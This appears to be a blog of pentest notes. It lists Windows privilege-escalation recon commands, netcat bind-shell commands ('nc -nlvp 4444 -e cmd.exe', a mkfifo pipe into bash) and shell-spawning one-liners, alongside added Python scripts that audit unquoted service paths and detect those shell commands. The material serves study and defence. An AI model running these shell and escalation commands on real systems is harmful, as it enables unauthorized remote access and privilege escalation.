Wednesday, May 24, 2017

Windows recon

  • Find running services
    sc query state= all
    sc query state= all | find "SERVICE_NAME"
  • Started Windows services - net start
  • List of running processes with user
    tasklist /v /fi "username ne djndfj" //(where djndfj is a user that does not exist; the filter then matches every process and /v adds the owning user.)
    tasklist /v /fi "username ne djndfj" | find /i "system" // processes running with SYSTEM privileges.
  • Read files - type <filename>
  • Create file echo "text" > path/filename
  • version - ver
  • environment variables - set
  • File permissions - cacls <filename> (deprecated; icacls <filename> on current Windows versions)
  • Lateral recon - ARP cache
    ARP -A
  • Scheduled tasks - schtasks /query /fo LIST /v
  • Processes with their hosted services - tasklist /SVC
  • Determine which services can be modified by any authenticated user - accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  • List all unquoted service paths (auto-start, outside C:\Windows) - wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
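The findstr chain above lists every auto-start service whose PathName lacks quotes, but only paths whose image path itself contains a space are actually exposed, and an audit should end with a remediation. The following Python script is an added example, not part of the original notes or of any tool referenced here: it parses constructed lines modelled on `wmic service get name,pathname,startmode /format:csv` output (the hosts, service names and paths are made up), applies the same Auto / not-under-C:\Windows filters, flags only unquoted image paths that contain a space, and builds the `sc config <service> binPath= "..."` command that quotes the path.

```python
import re

# Constructed sample modelled on "wmic service get name,pathname,startmode /format:csv"
# output. Service names and paths are made up for the example, not from a real host.
SAMPLE = """Node,Name,PathName,StartMode
HOST1,GoodSvc,"C:\\Program Files\\Good\\good.exe" -k run,Auto
HOST1,BadSvc,C:\\Program Files\\Bad App\\bad.exe -svc,Auto
HOST1,PlainSvc,C:\\Tools\\plain.exe,Auto
HOST1,ManualSvc,C:\\Program Files\\Manual\\m.exe,Manual
HOST1,SysSvc,C:\\Windows\\system32\\svchost.exe -k netsvcs,Auto
"""

# Everything up to and including the first ".exe" is treated as the image path;
# the rest of PathName is the service's argument string.
EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def executable_part(pathname):
    """Return the image-path portion of an unquoted PathName."""
    m = EXE_RE.match(pathname.strip())
    return m.group(1) if m else pathname.strip()


def is_vulnerable_path(pathname):
    """True only when the path is unquoted AND its image path contains a space.
    Spaces inside the arguments alone do not matter."""
    p = pathname.strip()
    if not p or p.startswith('"'):
        return False
    return " " in executable_part(p)


def parse_wmic_csv(text):
    """Parse Node,Name,PathName,StartMode rows; PathName may itself contain commas."""
    rows = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(",")
        if len(parts) < 4:
            continue
        rows.append({"name": parts[1],
                     "pathname": ",".join(parts[2:-1]),
                     "startmode": parts[-1].strip()})
    return rows


def suggest_fix(name, pathname):
    """Build the sc config command that wraps the image path in quotes."""
    exe = executable_part(pathname)
    args = pathname.strip()[len(exe):]
    return f'sc config {name} binPath= "\\"{exe}\\"{args}"'


def audit(text, skip_windows_dir=True):
    """Return findings for auto-start services with an exploitable unquoted path."""
    findings = []
    for row in parse_wmic_csv(text):
        if row["startmode"].lower() != "auto":
            continue
        if skip_windows_dir and row["pathname"].lower().startswith("c:\\windows\\"):
            continue
        if is_vulnerable_path(row["pathname"]):
            findings.append({"name": row["name"],
                             "pathname": row["pathname"],
                             "fix": suggest_fix(row["name"], row["pathname"])})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['name']}: {f['pathname']}\n  remediation: {f['fix']}")
```

On a real host, feed the script the saved output of the wmic command (or the equivalent `Get-CimInstance Win32_Service` export) instead of SAMPLE; the Windows-directory skip mirrors the page's findstr filter and can be disabled to review system services as well.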


Reference:

http://www.fuzzysecurity.com/tutorials/16.html
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
VizSec



Sunday, May 7, 2017

Command execution to Shell with Netcat

  • Linux (host) with netcat
    • $ mkfifo foo
    • nc -lk 2600 0<foo | /bin/bash 1>foo         /*2600 is the port*/

    On the attacking machine: $ nc <ip> 2600

  • Windows (host) with netcat
    • nc -nlvp 4444 -e cmd.exe

Shell Spawning

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB) exec "/bin/sh"
(From within vi) :!bash
(From within vi) :set shell=/bin/bash:shell
(From within nmap --interactive) !sh
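Every technique in the two posts above leaves a distinctive process command line: netcat listening with `-e`/`-c` and a shell, a netcat listener piped into a shell, or a scripting interpreter whose argument spawns `/bin/sh`. The Python below is an added detection example for process-creation telemetry (not code from the original notes or from any referenced tool); the event strings are constructed and the rule names are my own. It covers both the netcat and the shell-spawning sections.

```python
import re

# Constructed process-creation command lines (not real telemetry), mixing the
# patterns from the notes above with two benign look-alikes.
SAMPLE_EVENTS = [
    "nc -nlvp 4444 -e cmd.exe",
    "sh -c 'mkfifo foo; nc -lk 2600 0<foo | /bin/bash 1>foo'",
    "python -c 'import pty; pty.spawn(\"/bin/sh\")'",
    "perl -e 'exec \"/bin/sh\";'",
    "nc -zv db.internal 5432",          # plain port check, benign
    "python manage.py runserver",       # benign interpreter use
]

NETCAT = r"\b(?:nc|ncat|netcat)(?:\.exe)?\b"
SHELL = r"(?:(?:/bin/)?(?:ba)?sh\b|cmd\.exe|powershell(?:\.exe)?)"

# Each rule is (name, compiled regex). Names are constructed for this example.
RULES = [
    # netcat given a program to execute (-e / -c, possibly bundled with other flags)
    ("netcat_exec_shell",
     re.compile(NETCAT + r".*\s-[a-z]*[ec]\s+" + SHELL, re.IGNORECASE)),
    # netcat in listen mode whose output is piped into a shell (fifo variant)
    ("netcat_listener_piped_to_shell",
     re.compile(NETCAT + r".*\s-[a-z]*l[a-z]*\b.*\|\s*" + SHELL, re.IGNORECASE)),
    # interpreter one-liners that hand control to a shell
    ("interpreter_spawns_shell",
     re.compile(r"(?:pty\.spawn|os\.system|os\.exec\w*|\bexec\b)\s*\(?\s*['\"]"
                r"(?:/bin/)?(?:ba)?sh['\"]", re.IGNORECASE)),
]


def classify(cmdline):
    """Return the names of all rules matching one command line (empty if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Map each alerting command line to its rule names; benign lines are dropped."""
    return {ev: hits for ev in events if (hits := classify(ev))}


if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):32s} {cmdline}")
```

The rules key on the shell being handed control rather than on netcat or python alone, which is what keeps the port check and the web-server launch out of the alert list; in production the same logic would run over the command-line field of auditd EXECVE or Sysmon event 1 records.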